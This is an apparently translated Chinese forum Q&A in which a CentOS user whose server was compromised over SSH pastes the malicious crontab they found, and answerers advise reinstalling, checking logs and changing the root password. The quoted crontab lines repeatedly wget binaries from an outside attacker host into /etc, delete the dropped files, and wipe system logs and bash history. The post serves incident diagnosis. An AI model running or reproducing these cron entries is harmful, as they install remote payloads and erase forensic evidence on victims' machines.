Ssh CentOS被黑客入侵,crontab被修改
我相信有人/病毒侵入了我的CentOS,我最近打开了SSH一天。盒子在局域网里。我只是需要在外面用一会儿 那天晚上,linux在局域网中通过SSH访问变得很慢,打开任何本地网页也很慢。它的行为很奇怪。我检查CPU,它有时非常高。所以我检查了crontab。它已经改变了 有很多这样的东西:Ssh CentOS被黑客入侵,crontab被修改,ssh,crontab,virus,Ssh,Crontab,Virus,我相信有人/病毒侵入了我的CentOS,我最近打开了SSH一天。盒子在局域网里。我只是需要在外面用一会儿 那天晚上,linux在局域网中通过SSH访问变得很慢,打开任何本地网页也很慢。它的行为很奇怪。我检查CPU,它有时非常高。所以我检查了crontab。它已经改变了 有很多这样的东西: 20 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd */120 * * * * cd /etc; wget http://www.dgnf
20 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd
*/120 * * * * cd /root;rm -rf dir nohup.out
*/360 * * * * cd /etc;rm -rf dir atdd
*/360 * * * * cd /etc;rm -rf dir ksapd
*/360 * * * * cd /etc;rm -rf dir kysapd
*/360 * * * * cd /etc;rm -rf dir skysapd
*/360 * * * * cd /etc;rm -rf dir sksapd
*/360 * * * * cd /etc;rm -rf dir xfsdx
*/1 * * * * cd /etc;rm -rf dir cupsdd.*
*/1 * * * * cd /etc;rm -rf dir atdd.*
*/1 * * * * cd /etc;rm -rf dir ksapd.*
*/1 * * * * cd /etc;rm -rf dir kysapd.*
*/1 * * * * cd /etc;rm -rf dir skysapd.*
*/1 * * * * cd /etc;rm -rf dir sksapd.*
*/1 * * * * cd /etc;rm -rf dir xfsdx.*
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
我可以看到我的/etc/文件夹现在有许多红色文件夹,如下所示
srwsrwt 1 root root 1524643 Jan 31 21:06 atdd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:06 atddd
srwsrwt 1 root root 1258750 Nov 24 14:22 cupsdd
-rwsrwsrwt 1 root root 1258750 Nov 24 14:22 cupsddd
srwsrwt 1 root root 1524643 Jan 31 21:06 ksapd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:06 ksapdd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:06 kysapdd
srwsrwt 1 root root 1524643 Jan 10 20:06 sksapd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:07 sksapdd
-rwsrwsrwt 1 root root 1524643 Oct 24 04:55 skysapd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:07 skysapdd
srwsrwt 1 root root 1524643 Feb 5 17:26 xfsdx
-rwsrwsrwt 1 root root 1524643 Feb 5 17:26 xfsdxd
发生了什么事?我能做什么?一旦发生类似情况,只有完全重新安装机器才能解决问题。。特别是如果这是根用户的crontab文件 如果你真的想看看这个人是怎么进来的,如果他们没有植入根工具包,那么你可以查看类似/var/log/secure的日志,并查找sshd条目 但是,如果您的根用户已被破坏,唯一有意义的事情是完全重新安装 将来,您可以通过执行以下智能操作来最小化ssh访问问题:
删除crontab上的所有这些行,检查日志(例如,
/var/log/messages
),还可以使用last
查看最后的连接。并更改您的根密码以防万一。